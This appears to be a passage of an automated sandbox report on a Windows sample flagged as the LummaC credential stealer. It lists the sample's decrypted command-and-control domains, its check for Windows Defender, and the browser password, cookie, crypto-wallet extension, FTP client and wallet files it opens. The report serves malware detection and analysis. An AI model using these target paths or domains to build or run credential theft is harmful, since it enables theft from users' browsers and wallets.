            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020C0083 push dword ptr fs:[00000030h]0_2_020C0083
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F092B mov eax, dword ptr fs:[00000030h]0_2_020F092B
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F0D90 mov eax, dword ptr fs:[00000030h]0_2_020F0D90

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: SPFFah2O2q.exeString found in binary or memory: rapeflowwj.lat
            Source: SPFFah2O2q.exeString found in binary or memory: crosshuaht.lat
            Source: SPFFah2O2q.exeString found in binary or memory: sustainskelet.lat
            Source: SPFFah2O2q.exeString found in binary or memory: aspecteirs.lat
            Source: SPFFah2O2q.exeString found in binary or memory: energyaffai.lat
            Source: SPFFah2O2q.exeString found in binary or memory: necklacebudi.lat
            Source: SPFFah2O2q.exeString found in binary or memory: discokeyus.lat
            Source: SPFFah2O2q.exeString found in binary or memory: grannyejh.lat
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: SPFFah2O2q.exe PID: 768, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
